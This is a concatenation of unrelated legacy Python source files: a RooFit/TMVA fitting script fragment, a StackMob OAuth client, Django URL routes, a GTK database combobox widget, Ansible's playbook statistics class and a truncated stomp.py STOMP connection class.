w.var('mx').setVal(val) w.pdf('m1morph').plotOn(frame,ROOT.RooFit.LineColor(ROOT.kRed)) w.pdf('m0morph').plotOn(frame,ROOT.RooFit.LineColor(ROOT.kBlue)) frame.Draw() c1.SaveAs('root_bspline.pdf') def fitAdaptive(): #ugh, tough b/c fixed data are the features, not the NN output ROOT.gSystem.Load( 'TMVAWrapper/libTMVAWrapper' ) ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+") ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+") ROOT.gROOT.ProcessLine('.L CompositeFunctionPdf.cxx+') f = ROOT.TFile('workspace_adaptive_tree.root','r') w = f.Get('w') w.Print() w.factory('CompositeFunctionPdf::sigtemplate(fm0morphfunc)') w.factory('CompositeFunctionPdf::bkgtemplate(fm1morphfunc)') w.factory('Uniform::baseline(score)') w.factory('SUM::template(sigfrac[0,1]*sigtemplate,const[0.01]*baseline,bkgtemplate)') mu = w.var('mx') mu.setVal(0) c1 = ROOT.TCanvas('c1') sframe = w.var('score').frame() w.pdf('sigtemplate').plotOn(sframe) w.pdf('m0morph').plotOn(sframe,ROOT.RooFit.LineColor(ROOT.kGreen)) w.pdf('m1morph').plotOn(sframe,ROOT.RooFit.LineColor(ROOT.kRed)) w.pdf('sigtemplate').plotOn(sframe,ROOT.RooFit.LineColor(ROOT.kGreen)) w.pdf('bkgtemplate').plotOn(sframe,ROOT.RooFit.LineColor(ROOT.kRed)) w.pdf('template').plotOn(sframe,ROOT.RooFit.LineColor(ROOT.kBlack)) w.pdf('template').plotOn(sframe,ROOT.RooFit.Components('sigtemplate'),ROOT.RooFit.LineColor(ROOT.kRed)) w.pdf('template').plotOn(sframe,ROOT.RooFit.Components('bkgtemplate'),ROOT.RooFit.LineColor(ROOT.kGreen)) sframe.Draw() c1.SaveAs('template.pdf') #create a dataset for data = w.data('obsdata') data.Print() #need a RooAbsReal to evaluate NN(x,mu) #nn = ROOT.TMVAWrapper('nn','nn',x,mu) print "make RooArgSet" print "create TMVAWrapper " inputVars = ROOT.RooArgList(w.set('inputvars')) inputVars.Print() nn = ROOT.TMVAWrapper('nn','nn',inputVars,"TMVARegression_ttbar_14tev_jes1.root_MLP.weights.xml") #weightfile = "TMVARegression_alphavary.root_MLP.weights.xml" print "about to import" print "get val = ", nn.getVal() getattr(w,'import')(ROOT.RooArgSet(nn),ROOT.RooFit.RecycleConflictNodes()) w.Print() print "ok, almost done" #create nll based on pdf(NN(x,mu) | mu) w.factory('EDIT::pdf(template,score=nn)') #w.factory('EDIT::pdf(pdftemp,mu=mx)') #resetting mu->mux dies. #w.factory('EDIT::pdf(template,score=nn,mu=mx)') #wory that DataHist & HistPdf observable not being reset pdf = w.pdf('pdf') print 'pdf has expected events = ', pdf.expectedEvents(ROOT.RooArgSet(nn)) w.Print() pdf.graphVizTree('pdf2bTMVA.dot') mu = w.var('mx') mu.setConstant(False) mu.Print() #construct likelihood and plot it nll = pdf.createNLL(data) #nll = pdf.createNLL(data,ROOT.RooFit.Extended(False)) #restrict NLL to relevant region in mu #frame=mu.frame(-.7,.7) frame=mu.frame() nll.plotOn(frame, ROOT.RooFit.ShiftToZero()) frame.SetMinimum(0) frame.SetMaximum(10) frame.Draw() c1.SaveAs('fitAdaptiveTMVA.pdf') pdf.fitTo(data,ROOT.RooFit.Extended(False)) return def makeBSpline(w,interpParam, observable, pdfList, paramPoints,name='morph',): ''' The helper function to create the parametrized model that interpolates across input pdfs ''' ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+") ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+") paramVec = ROOT.TVectorD(len(paramPoints)) tValues = ROOT.std.vector("double")() for i, p in enumerate(paramPoints): paramVec[i]=p #seems silly, but other constructor gave problems tValues.push_back(p) order=3 bspb = ROOT.RooStats.HistFactory.RooBSplineBases( "bases", "bases", order, tValues, interpParam ) pdfs = ROOT.RooArgList() for pdf in pdfList: pdfs.add(pdf) #this makes a function morphfunc = ROOT.RooStats.HistFactory.RooBSpline( 'f'+name+'func', "morphfunc", pdfs, bspb, ROOT.RooArgSet() ) #if you want to convert it into a PDF morph = ROOT.RooRealSumPdf(name,name, ROOT.RooArgList(morphfunc), ROOT.RooArgList()) print morph #getattr(w,'import')(morph) # work around for morph = w.import(morph) getattr(w,'import')(ROOT.RooArgSet(morph),ROOT.RooFit.RecycleConflictNodes()) # work around for morph = w.import(morph) w.importClassCode() return w if __name__ == '__main__': ''' The main function that calls the individual steps of the procedure ''' plotScore() #createPdfForAdaptive() #plotAdaptive() #fitAdaptive()
import oauth.oauth as oauth import httplib import json import sys class BaseClient: def __init__(self, baseURL, key, secret): self.url = baseURL self.connection = httplib.HTTPConnection(baseURL) self.consumer = oauth.OAuthConsumer(key, secret) def _execute(self, httpmethod, path, body): request = oauth.OAuthRequest.from_consumer_and_token(self.consumer, http_method=httpmethod, http_url="http://" + self.url + "/" + path) request.sign_request(oauth.OAuthSignatureMethod_HMAC_SHA1(), self.consumer, None) headers = request.to_header() headers["Content-Type"] = "application/json" headers["Accept"] = "application/vnd.stackmob+json; version=0" self.connection.set_debuglevel(1) bodyString = "" if(body != None): bodyString = json.dumps(body) self.connection.request(request.http_method, "/"+path, body=bodyString, headers=headers) return self.connection.getresponse() def get(self, path): self._execute("GET", path, None) def post(self, path, body): self._execute("POST", path, body) def put(self, path, body): self._execute("PUT", path, body) def delete(self, path): self._execute("DELETE", path, None) class APIClient(BaseClient): def __init__(self, key, secret): super.__init__("api.mob1.stackmob.com", key, secret) class PushAPIClient(BaseClient): def __init__(self, key, secret): super.__init__("push.mob1.stackmob.com", key, secret)
from django.conf.urls.defaults import patterns, include, url from django.utils.functional import curry from django.views.defaults import server_error, page_not_found from tracker.api import MemberResource, ReportResource from tastypie.api import Api v1_api = Api(api_name='v1') v1_api.register(MemberResource()) v1_api.register(ReportResource()) # Uncomment the next two lines to enable the admin: from django.contrib import admin admin.autodiscover() handler500 = curry(server_error, template_name='admin/500.html') handler404 = curry(page_not_found, template_name='admin/404.html') urlpatterns = patterns('tracker.views', # Examples: # url(r'^$', 'socialcongress.views.home', name='home'), url(r'^admin/_update$', 'update', name="update"), url(r'^admin/chamber/(?P<chamber>[-a-z]+)/$', 'chamber_csv', name='admin_chamber_csv'), url(r'^admin/weekly/chamber/(?P<chamber>[-a-z]+)/$', 'weekly_csv', name='admin_weekly_csv'), #url(r'^reports/weeks/$', 'week_index', name='week_index'), # Uncomment the next line to enable the admin: url(r'^admin/', include(admin.site.urls)), # API urls url(r'^api/', include(v1_api.urls)), )
# -*- coding: utf-8 -*- ############################################################################### # Copyright (C) 2008 EVO Sistemas Libres <[email protected]> # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. ############################################################################### # dbcombobox # Database gtk.ComboBox widget module ############################################################################### # GTK Imports import gobject, gtk # DBWidget base class from dbwidgetbase import DBWidgetBase class DBComboBox(gtk.ComboBox,DBWidgetBase): """ Database gtk.ComboBox widget """ __gtype_name__ = 'DBComboBox' # Widget properties __properties = { 'choices' : (gobject.TYPE_STRING,'Choices','Separated values of choice for the widget (separator character is used as separator)','',gobject.PARAM_CONSTRUCT | gobject.PARAM_READWRITE), 'separator-char' : (gobject.TYPE_STRING,'Separator','Separator character used to separate choice values',',',gobject.PARAM_CONSTRUCT | gobject.PARAM_READWRITE), } __properties.update(DBWidgetBase._DBWidgetBase__properties) __gproperties__ = __properties def __init__(self,*args,**kwargs): """ Class initialization """ # Initialize DBWidget base class DBWidgetBase.__init__(self,*args,**kwargs) # Initialize parent widget gtk.ComboBox.__init__(self) # List store for data self.__liststore = gtk.ListStore(str,gtk.gdk.Pixbuf) self.set_model(self.__liststore) # Cell renderers for combobox crt = gtk.CellRendererText() self.pack_start(crt, True) self.add_attribute(crt, 'text', 0) crp = gtk.CellRendererPixbuf() crp.set_property('xalign',1) self.pack_start(crp, True) self.add_attribute(crp, 'pixbuf', 1) # Blank and error pixbufs self.__blankpixbuf=gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB,True,8,1,1) self.__errorpixbuf=self.render_icon(gtk.STOCK_DIALOG_ERROR, gtk.ICON_SIZE_MENU) # Widget properties if self.inmediate_validation: self.connect('changed',self.validate) def get_widget_data(self): """ Returns widget data """ iter=self.get_active_iter() if iter: return self.__liststore.get_value(iter,0) else: return None def set_invalidated(self): """ Set this widget as invalidated """ iter=self.__liststore.get_iter_first() while iter: self.__liststore.set_value(iter,1,self.__blankpixbuf) iter=self.__liststore.iter_next(iter) iter=self.get_active_iter() if iter: self.__liststore.set_value(iter,1,self.__errorpixbuf) def set_validated(self): """ Set this widget as validated """ self.__validationerrors=[] iter=self.__liststore.get_iter_first() while iter: self.__liststore.set_value(iter,1,self.__blankpixbuf) iter=self.__liststore.iter_next(iter) def do_get_property(self, property): """ Property getting value handling """ if property.name=='choices': return self.choices elif property.name=='separator-char': return self.separator_char else: return DBWidgetBase.do_get_property(self, property) def do_set_property(self, property, value): """ Property setting value handling """ if property.name=='choices': self.choices=value # Set values self.__liststore.clear() if value: for choice in value.split(self.separator_char): self.__liststore.append([choice,self.__blankpixbuf]) self.set_active(0) elif property.name=='separator-char': self.separator_char=value else: DBWidgetBase.do_set_property(self, property, value) gobject.type_register(DBComboBox)
# (c) 2012-2014, Michael DeHaan <[email protected]> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type from ansible.utils.vars import merge_hash class AggregateStats: ''' holds stats about per-host activity during playbook runs ''' def __init__(self): self.processed = {} self.failures = {} self.ok = {} self.dark = {} self.changed = {} self.skipped = {} # user defined stats, which can be per host or global self.custom = {} def increment(self, what, host): ''' helper function to bump a statistic ''' self.processed[host] = 1 prev = (getattr(self, what)).get(host, 0) getattr(self, what)[host] = prev+1 def summarize(self, host): ''' return information about a particular host ''' return dict( ok = self.ok.get(host, 0), failures = self.failures.get(host, 0), unreachable = self.dark.get(host,0), changed = self.changed.get(host, 0), skipped = self.skipped.get(host, 0) ) def set_custom_stats(self, which, what, host=None): ''' allow setting of a custom stat''' if host is None: host = '_run' if host not in self.custom: self.custom[host] = {which: what} else: self.custom[host][which] = what def update_custom_stats(self, which, what, host=None): ''' allow aggregation of a custom stat''' if host is None: host = '_run' if host not in self.custom or which not in self.custom[host]: return self.set_custom_stats(which, what, host) # mismatching types if type(what) != type(self.custom[host][which]): return None if isinstance(what, dict): self.custom[host][which] = merge_hash(self.custom[host][which], what) else: # let overloaded + take care of other types self.custom[host][which] += what
import math import random import re import socket import sys import threading import time import types import xml.dom.minidom try: from cStringIO import StringIO except ImportError: from io import StringIO try: import ssl from ssl import SSLError DEFAULT_SSL_VERSION = ssl.PROTOCOL_SSLv3 except ImportError: # python version < 2.6 without the backported ssl module ssl = None class SSLError: pass DEFAULT_SSL_VERSION = None try: from socket import SOL_SOCKET, SO_KEEPALIVE from socket import SOL_TCP, TCP_KEEPIDLE, TCP_KEEPINTVL, TCP_KEEPCNT LINUX_KEEPALIVE_AVAIL=True except ImportError: LINUX_KEEPALIVE_AVAIL=False import exception import listener import utils from backward import decode, encode, hasbyte, pack, socksend, NULL try: import uuid except ImportError: from backward import uuid try: from fractions import gcd except ImportError: from backward import gcd import logging log = logging.getLogger('stomp.py') class Connection(object): """ Represents a STOMP client connection. """ # ========= PRIVATE MEMBERS ========= # List of all host names (unqualified, fully-qualified, and IP # addresses) that refer to the local host (both loopback interface # and external interfaces). This is used for determining # preferred targets. __localhost_names = [ "localhost", "" ] try: __localhost_names.append(socket.gethostbyname(socket.gethostname())) except: pass try: __localhost_names.append(socket.gethostname()) except: pass try: __localhost_names.append(socket.getfqdn(socket.gethostname())) except: pass # # Used to parse the STOMP "content-length" header lines, # __content_length_re = re.compile('^content-length[:]\\s*(?P<value>[0-9]+)', re.MULTILINE) def __init__(self, host_and_ports = [ ('localhost', 61613) ], user = None, passcode = None, prefer_localhost = True, try_loopback_connect = True, reconnect_sleep_initial = 0.1, reconnect_sleep_increase = 0.5, reconnect_sleep_jitter = 0.1, reconnect_sleep_max = 60.0, reconnect_attempts_max = 3, use_ssl = False, ssl_key_file = None, ssl_cert_file = None, ssl_ca_certs = None, ssl_cert_validator = None, wait_on_receipt = False, ssl_version = DEFAULT_SSL_VERSION, timeout = None, version = 1.0, strict = True, heartbeats = (0, 0), keepalive = None ): """ Initialize and start this connection. \param host_and_ports a list of (host, port) tuples. \param prefer_localhost if True and the local host is mentioned in the (host, port) tuples, try to connect to this first \param try_loopback_connect if True and the local host is found in the host tuples, try connecting to it using loopback interface ( \param reconnect_sleep_initial initial delay in seconds to wait before reattempting to establish a connection if connection to any of the hosts fails. \param reconnect_sleep_increase factor by which the sleep delay is increased after each connection attempt. For example, 0.5 means to wait 50% longer than before the previous attempt, 1.0 means wait twice as long, and 0.0 means keep the delay constant. \param reconnect_sleep_max maximum delay between connection attempts, regardless of the reconnect_sleep_increase. \param reconnect_sleep_jitter random additional time to wait (as a percentage of the time determined using the previous parameters) between connection attempts in order to avoid stampeding. For example, a value of 0.1 means to wait an extra 0%-10% (randomly determined) of the delay calculated using the previous three parameters. \param reconnect_attempts_max maximum attempts to reconnect \param use_ssl connect using SSL to the socket. This wraps the socket in a SSL connection. The constructor will raise an exception if you ask for SSL, but it can't find the SSL module. \param ssl_cert_file the path to a X509 certificate \param ssl_key_file the path to a X509 key file \param ssl_ca_certs the path to the a file containing CA certificates to validate the server against. If this is not set, server side certificate validation is not done. \param ssl_cert_validator function which performs extra validation on the client certificate, for example checking the returned certificate has a commonName attribute equal to the hostname (to avoid man in the middle attacks). The signature is: (OK, err_msg) = validation_function(cert, hostname) where OK is a boolean, and cert is a certificate structure as returned by ssl.SSLSocket.getpeercert() \param wait_on_receipt if a receipt is specified, then the send method should wait (block) for the server to respond with that receipt-id before continuing \param ssl_version SSL protocol to use for the connection. This should be one of the PROTOCOL_x constants provided by the ssl module. The default is ssl.PROTOCOL_SSLv3 \param timeout the timeout value to use when connecting the stomp socket \param version STOMP protocol version (1.0 or 1.1) \param strict if true, use the strict version of the protocol. For STOMP 1.1, this means it will use the STOMP connect header, rather than CONNECT. \param heartbeats a tuple containing the heartbeat send and receive time in millis. (0,0) if no heartbeats \param keepalive some operating systems support sending the occasional heart beat packets to detect when a connection fails. This parameter can either be set set to a boolean to turn on the default keepalive options for your OS, or as a tuple of values, which also enables keepalive packets, but specifies options specific to your OS implementation """ sorted_host_and_ports = [] sorted_host_and_ports.extend(host_and_ports) # # If localhost is preferred, make sure all (host, port) tuples that refer to the local host come first in the list # if prefer_localhost: sorted_host_and_ports.sort(key = self.is_localhost) # # If the user wishes to attempt connecting to local ports using the loopback interface, for each (host, port) tuple # referring to a local host, add an entry with the host name replaced by if it doesn't exist already # loopback_host_and_ports = [] if try_loopback_connect: for host_and_port in sorted_host_and_ports: if self.is_localhost(host_and_port) == 1: port = host_and_port[1] if (not ("", port) in sorted_host_and_ports and not ("localhost", port) in sorted_host_and_ports): loopback_host_and_ports.append(("", port)) # # Assemble the final, possibly sorted list of (host, port) tuples # self.__host_and_ports = [] self.__host_and_ports.extend(loopback_host_and_ports) self.__host_and_ports.extend(sorted_host_and_ports) self.__recvbuf = '' self.__listeners = {} self.__reconnect_sleep_initial = reconnect_sleep_initial self.__reconnect_sleep_increase = reconnect_sleep_increase self.__reconnect_sleep_jitter = reconnect_sleep_jitter self.__reconnect_sleep_max = reconnect_sleep_max self.__reconnect_attempts_max = reconnect_attempts_max self.__timeout = timeout self.__connect_headers = {} if user is not None and passcode is not None: self.__connect_headers['login'] = user self.__connect_headers['passcode'] = passcode self.__socket = None self.__socket_semaphore = threading.BoundedSemaphore(1) self.__current_host_and_port = None self.__receiver_thread_exit_condition = threading.Condition() self.__receiver_thread_exited = False self.__send_wait_condition = threading.Condition() self.__connect_wait_condition = threading.Condition() self.blocking = None self.connected = False # setup SSL if use_ssl and not ssl: raise Exception("SSL connection requested, but SSL library not found.") self.__ssl = use_ssl self.__ssl_cert_file = ssl_cert_file self.__ssl_key_file = ssl_key_file self.__ssl_ca_certs = ssl_ca_certs self.__ssl_cert_validator = ssl_cert_validator self.__ssl_version = ssl_version self.__receipts = {} self.__wait_on_receipt = wait_on_receipt # protocol version self.version = version self.__strict = strict # setup heartbeating if version < 1.1 and heartbeats != (0, 0): raise exception.ProtocolException('Heartbeats can only be set on a 1.1+ connection') self.heartbeats = heartbeats # used for 1.1 heartbeat messages (set to true every time a heartbeat message arrives) self.__received_heartbeat = time.time() # flag used when we receive the disconnect receipt self.__disconnect_receipt = None # function for creating threads used by the connection self.create_thread_fc = default_create_thread self.__keepalive = keepalive def is_localhost(self, host_and_port): """ Return true if the specified host+port is a member of the 'localhost' list of hosts """ (host, port) = host_and_port if host in Connection.__localhost_names: return 1 else: return 2 def override_threading(self, create_thread_fc): """ Override for thread creation. Use an alternate threading library by setting this to a function with a single argument (which is the receiver loop callback). The thread which is returned should be started (ready to run) """ self.create_thread_fc = create_thread_fc # # Manage the connection # def start(self): """ Start the connection. This should be called after all listeners have been registered. If this method is not called, no frames will be received by the connection. """ self.__running = True self.__attempt_connection() thread = self.create_thread_fc(self.__receiver_loop) self.__notify('connecting') def stop(self): """ Stop the connection. This is equivalent to calling disconnect() but will do a clean shutdown by waiting for the receiver thread to exit. """ self.disconnect() self.__receiver_thread_exit_condition.acquire() if not self.__receiver_thread_exited: self.__receiver_thread_exit_condition.wait() self.__receiver_thread_exit_condition.release() def get_host_and_port(self): """ Return a (host, port) tuple indicating which STOMP host and port is currently connected, or None if there is currently no connection. """ return self.__current_host_and_port def is_connected(self): """ Return true if the socket managed by this connection is connected """ try: return self.__socket is not None and self.__socket.getsockname()[1] != 0 and self.connected except socket.error: return False # # Manage objects listening to incoming frames # def set_listener(self, name, listener): """ Set a named listener on this connection \see listener::ConnectionListener \param name the name of the listener \param listener the listener object """ self.__listeners[name] = listener def remove_listener(self, name): """ Remove a listener according to the specified name \param name the name of the listener to remove """ del self.__listeners[name] def get_listener(self, name): """ Return a named listener \param name the listener to return """ if name in self.__listeners: return self.__listeners[name] else: return None # # STOMP transmissions # def subscribe(self, headers={}, **keyword_headers): """ Send a SUBSCRIBE frame to subscribe to a queue """ merged_headers = utils.merge_headers([headers, keyword_headers]) required_headers = [ 'destination' ] if self.version >= 1.1: required_headers.append('id') self.__send_frame_helper('SUBSCRIBE', '', merged_headers, required_headers) def unsubscribe(self, headers={}, **keyword_headers): """ Send an UNSUBSCRIBE frame to unsubscribe from a queue """ merged_headers = utils.merge_headers([headers, keyword_headers]) self.__send_frame_helper('UNSUBSCRIBE', '', merged_headers, [ ('destination', 'id') ]) def send(self, message='', headers={}, **keyword_headers): """ Send a message (SEND) frame """ merged_headers = utils.merge_headers([headers, keyword_headers]) if self.__wait_on_receipt and 'receipt' in merged_headers.keys(): self.__send_wait_condition.acquire() self.__send_frame_helper('SEND', message, merged_headers, [ 'destination' ]) self.__notify('send', headers, message) # if we need to wait-on-receipt, then block until the receipt frame arrives if self.__wait_on_receipt and 'receipt' in merged_headers.keys(): receipt = merged_headers['receipt'] while receipt not in self.__receipts: self.__send_wait_condition.wait() self.__send_wait_condition.release() del self.__receipts[receipt] def ack(self, headers={}, **keyword_headers): """ Send an ACK frame, to acknowledge receipt of a message """ self.__send_frame_helper('ACK', '', utils.merge_headers([headers, keyword_headers]), [ 'message-id' ]) def nack(self, headers={}, **keyword_headers): """ Send an NACK frame, to acknowledge a message was not successfully processed """ if self.version < 1.1: raise RuntimeError('NACK is not supported with 1.0 connections') self.__send_frame_helper('NACK', '', utils.merge_headers([headers, keyword_headers]), [ 'message-id' ]) def begin(self, headers={}, **keyword_headers): """ Send a BEGIN frame to start a transaction """ use_headers = utils.merge_headers([headers, keyword_headers]) if not 'transaction' in use_headers.keys(): use_headers['transaction'] = str(uuid.uuid4()) self.__send_frame_helper('BEGIN', '', use_headers, [ 'transaction' ]) return use_headers['transaction'] def abort(self, headers={}, **keyword_headers): """ Send an ABORT frame to rollback a transaction """ self.__send_frame_helper('ABORT', '', utils.merge_headers([headers, keyword_headers]), [ 'transaction' ]) def commit(self, headers={}, **keyword_headers): """ Send a COMMIT frame to commit a transaction (send pending messages) """ self.__send_frame_helper('COMMIT', '', utils.merge_headers([headers, keyword_headers]), [ 'transaction' ]) def connect(self, headers={}, **keyword_headers): """ Send a CONNECT frame to start a connection """ wait = False if 'wait' in keyword_headers and keyword_headers['wait']: wait = True del keyword_headers['wait'] if self.version >= 1.1: if self.__strict: cmd = 'STOMP' else: cmd = 'CONNECT' headers['accept-version'] = self.version headers['heart-beat'] = '%s,%s' % self.heartbeats else: cmd = 'CONNECT' self.__send_frame_helper(cmd, '', utils.merge_headers([self.__connect_headers, headers, keyword_headers]), [ ]) if wait: self.__connect_wait_condition.acquire() while not self.is_connected(): self.__connect_wait_condition.wait() self.__connect_wait_condition.release() def disconnect_socket(self): self.__running = False if self.__socket is not None: if self.__ssl: # # Even though we don't want to use the socket, unwrap is the only API method which does a proper SSL shutdown # try: self.__socket = self.__socket.unwrap() except Exception: # # unwrap seems flaky on Win with the backported ssl mod, so catch any exception and log it # _, e, _ = sys.exc_info() log.warn(e) elif hasattr(socket, 'SHUT_RDWR'): try: self.__socket.shutdown(socket.SHUT_RDWR) except socket.error: _, e, _ = sys.exc_info() log.warn('Unable to issue SHUT_RDWR on socket because of error "%s"' % e) # # split this into a separate check, because sometimes the socket is nulled between shutdown and this call # if self.__socket is not None: try: self.__socket.close() except socket.error: _, e, _ = sys.exc_info() log.warn('Unable to close socket because of error "%s"' % e) self.__current_host_and_port = None def disconnect(self, send_disconnect=True, headers={}, **keyword_headers): """ Send a DISCONNECT frame to finish a connection """ try: self.__send_frame_helper('DISCONNECT', '', utils.merge_headers([self.__connect_headers, headers, keyword_headers]), [ ]) except exception.NotConnectedException: _, e, _ = sys.exc_info() self.disconnect_socket() raise e if self.version >= 1.1 and 'receipt' in headers: self.__disconnect_receipt = headers['receipt'] else: self.disconnect_socket() def __convert_dict(self, payload): """ Encode a python dictionary as a <map>...</map> structure. """ xmlStr = "<map>\n" for key in payload: xmlStr += "<entry>\n" xmlStr += "<string>%s</string>" % key xmlStr += "<string>%s</string>" % payload[key] xmlStr += "</entry>\n" xmlStr += "</map>" return xmlStr def __send_frame_helper(self, command, payload, headers, required_header_keys): """ Helper function for sending a frame after verifying that a given set of headers are present. \param command the command to send \param payload the frame's payload \param headers a dictionary containing the frame's headers \param required_header_keys a sequence enumerating all required header keys. If an element in this sequence is itself a tuple, that tuple is taken as a list of alternatives, one of which must be present. \throws ArgumentError if one of the required header keys is not present in the header map. """ for required_header_key in required_header_keys: if type(required_header_key) == tuple: found_alternative = False for alternative in required_header_key: if alternative in headers.keys(): found_alternative = True if not found_alternative: raise KeyError("Command %s requires one of the following headers: %s" % (command, str(required_header_key))) elif not required_header_key in headers.keys(): raise KeyError("Command %s requires header %r" % (command, required_header_key)) self.__send_frame(command, headers, payload) def __send_frame(self, command, headers={}, payload=''): """ Send a STOMP frame. \param command the frame command \param headers a map of headers (key-val pairs) \param payload the message payload """ if type(payload) == dict: headers["transformation"] = "jms-map-xml" payload = self.__convert_dict(payload) if payload: payload = encode(payload) if hasbyte(0, payload): headers.update({'content-length': len(payload)}) if self.__socket is not None: try: frame = [ ] if command is not None: frame.append(command + '\n') for key, val in headers.items(): frame.append('%s:%s\n' % (key, val)) frame.append('\n') if payload: frame.append(payload) if command is not None: # only send the terminator if we're sending a command (heartbeats have no term) frame.append(NULL) frame = pack(frame) self.__socket_semaphore.acquire() try: socksend(self.__socket, frame) log.debug("Sent frame: type=%s, headers=%r, body=%r" % (command, headers, payload)) finally: self.__socket_semaphore.release() except Exception: _, e, _ = sys.exc_info() log.error("Error sending frame: %s" % e) raise e else: raise exception.NotConnectedException() def __notify(self, frame_type, headers=None, body=None): """ Utility function for notifying listeners of incoming and outgoing messages \param frame_type the type of message \param headers the map of headers associated with the message \param body the content of the message """ if frame_type == 'receipt': # logic for wait-on-receipt notification self.__send_wait_condition.acquire() self.__send_wait_condition.notify() self.__send_wait_condition.release() receipt = headers['receipt-id'] self.__receipts[receipt] = None # received a stomp 1.1 disconnect receipt if receipt == self.__disconnect_receipt: self.disconnect_socket() if frame_type == 'connected': self.connected = True self.__connect_wait_condition.acquire() self.__connect_wait_condition.notify() self.__connect_wait_condition.release() if 'version' not in headers.keys(): if self.version >= 1.1: log.warn('Downgraded STOMP protocol version to 1.0') self.version = 1.0 if 'heart-beat' in headers.keys(): self.heartbeats = utils.calculate_heartbeats(headers['heart-beat'].replace(' ', '').split(','), self.heartbeats) if self.heartbeats != (0,0): default_create_thread(self.__heartbeat_loop) for listener in self.__listeners.values(): if not listener: continue if not hasattr(listener, 'on_%s' % frame_type): log.debug('listener %s has no method on_%s' % (listener, frame_type)) continue if frame_type == 'connecting': listener.on_connecting(self.__current_host_and_port) continue elif frame_type == 'disconnected': self.connected = False listener.on_disconnected() continue notify_func = getattr(listener, 'on_%s' % frame_type) notify_func(headers, body) def __receiver_loop(self): """ Main loop listening for incoming data. """ log.debug("Starting receiver loop") try: try: while self.__running: if self.__socket is None: break try: try: while self.__running: frames = self.__read() for frame in frames: (frame_type, headers, body) = utils.parse_frame(frame) log.debug("Received frame: %r, headers=%r, body=%r" % (frame_type, headers, body)) frame_type = frame_type.lower() if frame_type in [ 'connected', 'message', 'receipt', 'error' ]: self.__notify(frame_type, headers, body) elif frame_type == 'heartbeat': # no notifications needed pass else: log.warning('Unknown response frame type: "%s" (frame length was %d)' % (frame_type, len(frame))) finally: try: self.__socket.close() except: pass # ignore errors when attempting to close socket self.__socket = None self.__current_host_and_port = None except exception.ConnectionClosedException: if self.__running: log.error("Lost connection") self.__notify('disconnected') # # Clear out any half-received messages after losing connection # self.__recvbuf = '' self.__running = False break except: log.exception("An unhandled exception was encountered in the stomp receiver loop") finally: self.__receiver_thread_exit_condition.acquire() self.__receiver_thread_exited = True self.__receiver_thread_exit_condition.notifyAll() self.__receiver_thread_exit_condition.release() log.debug("Receiver loop ended") def __heartbeat_loop(self): """ Loop for sending (and monitoring received) heartbeats """ send_sleep = self.heartbeats[0] / 1000 # receive gets an additional threshold of 3 additional seconds receive_sleep = (self.heartbeats[1] / 1000) + 3 if send_sleep == 0: sleep_time = receive_sleep elif receive_sleep == 0: sleep_time = send_sleep else: # sleep is the GCD of the send and receive times sleep_time = gcd(send_sleep, receive_sleep) / 2 send_time = time.time() receive_time = time.time() while self.__running: time.sleep(sleep_time) if time.time() - send_time > send_sleep: send_time = time.time() log.debug('Sending a heartbeat message') self.__send_frame(None) if time.time() - receive_time > receive_sleep: if time.time() - self.__received_heartbeat > receive_sleep: log.debug('Heartbeat timeout') # heartbeat timeout for listener in self.__listeners.values(): listener.on_heartbeat_timeout() self.disconnect_socket() self.connected = False def __read(self): """ Read the next frame(s) from the socket. """ fastbuf = StringIO() while self.__running: try: c = self.__socket.recv(1024) c = decode(c) # reset the heartbeat for any received message self.__received_heartbeat = time.time() except Exception: _, e, _ = sys.exc_info() c = '' if len(c) == 0: raise exception.ConnectionClosedException() fastbuf.write(c) if '\x00' in c: break elif c == '\x0a': # heartbeat (special case) return c self.__recvbuf += fastbuf.getvalue() fastbuf.close() result = [] if len(self.__recvbuf) > 0 and self.__running: while True: pos = self.__recvbuf.find('\x00') if pos >= 0: frame = self.__recvbuf[0:pos] preamble_end = frame.find('\n\n') if preamble_end >= 0: content_length_match = Connection.__content_length_re.search(frame[0:preamble_end]) if content_length_match: content_length = int(content_length_match.group('value')) content_offset = preamble_end + 2 frame_size = content_offset + content_length if frame_size > len(frame): # # Frame contains NUL bytes, need to read more # if frame_size < len(self.__recvbuf): pos = frame_size frame = self.__recvbuf[0:pos] else: # # Haven't read enough data yet, exit loop and wait for more to arrive # break result.append(frame) self.__recvbuf = self.__recvbuf[pos+1:] else: break return result def __enable_keepalive(self): def try_setsockopt(sock, name, fam, opt, val): if val is None: return True # no value to set always works try: sock.setsockopt(fam, opt, val) log.debug('keepalive: set %r option to %r on socket' % (name, val)) except: log.error('keepalive: unable to set %r option to %r on socket' % (name,val)) return False return True ka = self.__keepalive if not ka: return if ka == True: ka_sig = 'auto' ka_args = () else: try: ka_sig = ka[0] ka_args = ka[1:] except Exception: log.error('keepalive: bad specification %r' % (ka,)) return if ka_sig == 'auto': if LINUX_KEEPALIVE_AVAIL: ka_sig = 'linux' ka_args = None log.debug('keepalive: autodetected linux-style support') else: log.error('keepalive: unable to detect any implementation, DISABLED!') return if ka_sig == 'linux': log.debug('keepalive: activating linux-style support') if ka_args is None: log.debug('keepalive: using system defaults') ka_args = (None, None, None) lka_idle, lka_intvl, lka_cnt = ka_args if try_setsockopt(self.__socket, 'enable', SOL_SOCKET, SO_KEEPALIVE, 1): try_setsockopt(self.__socket, 'idle time', SOL_TCP, TCP_KEEPIDLE, lka_idle) try_setsockopt(self.__socket, 